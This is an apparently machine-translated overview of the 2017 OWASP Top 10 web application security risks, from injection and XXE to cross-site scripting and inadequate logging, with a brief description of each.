One, 2017-Injection
When sending untrusted data to the parser as part of a command or query. There will be injection flaws such as sql injection, nosql injection, os injection and LDAP injection. An attacker's malicious data can trick the parser into executing unintended commands or accessing data without proper authorization.
Second, the invalid authentication
Often, through misuse of an application's authentication and session management features, attackers are able to decipher passwords, keys, or session tokens, or exploit other development flaws to temporarily or permanently impersonate another user's identity.
3. Sensitive data leakage
Many web applications and APIs fail to properly protect sensitive data. For example: financial data, medical data, PH data. Attackers can steal or modify unencrypted data to commit credit card fraud, identity theft, or other crimes. Unencrypted sensitive data is vulnerable to damage, so we encrypt sensitive information, including: . Data in transit, stored data, and browser interaction data.
Fourth, external entities (xxe)
Lots of older or misconfigured xml. The processor evaluates the external entity reference of the xml file. Attackers can exploit external entities to steal internal and shared files using URL file handlers, listen on internal scan ports, execute remote code, and perform denial-of-service attacks.
Five, invalid access control
Proper access controls are not implemented for authenticated users. Attackers can exploit these flaws to access unauthorized functions or data, such as: accessing other users' accounts, viewing sensitive files, modifying other users' data, changing access permissions, etc.
Six, security configuration error
Security misconfiguration is the most common security issue, which is usually caused by insecure default configuration, incomplete temporary configuration, open source cloud storage, incorrect http header configuration, and detailed error messages containing sensitive information. So not only do we need to securely configure all operating systems, frameworks, libraries and applications, but we must patch and upgrade them in a timely manner.
Seven: Cross-site scripting (xxs)
The xss flaw occurs when an application's new web pages contain untrusted, improperly validated or escaped data, or when an existing web page is updated using a browser API that can create HTML or javascript, xss allows Attackers are able to execute scripts in the victim's browser and hijack user sessions, disrupt websites or redirect users to malicious sites.
Eight: Unsafe deserialization
Unsafe deserialization can lead to remote code execution. Even if the deserialization flaw does not lead to remote code execution, attackers can exploit it for attacks including: replay attacks, injection attacks, and privilege escalation attacks.
9. Use components with known vulnerabilities
Components (such as: libraries, frameworks and other software modules) have the same permissions as applications. If a component of an application with a known vulnerability is exploited by an attacker, it could result in severe data loss or server takeover. At the same time, applications and APIs that use components that contain known vulnerabilities can compromise application defenses, causing various attacks with severe impact.
10. Inadequate logging and monitoring
Inadequate logging and monitoring, and missing or ineffective integration of incident response, allow attackers to further attack systems, maintain persistence or move to more systems, and tamper, extract, or destroy data. Most defect data studies show that defects are detected for more than 200 days and are usually detected by external inspectors rather than by internal processes or monitoring.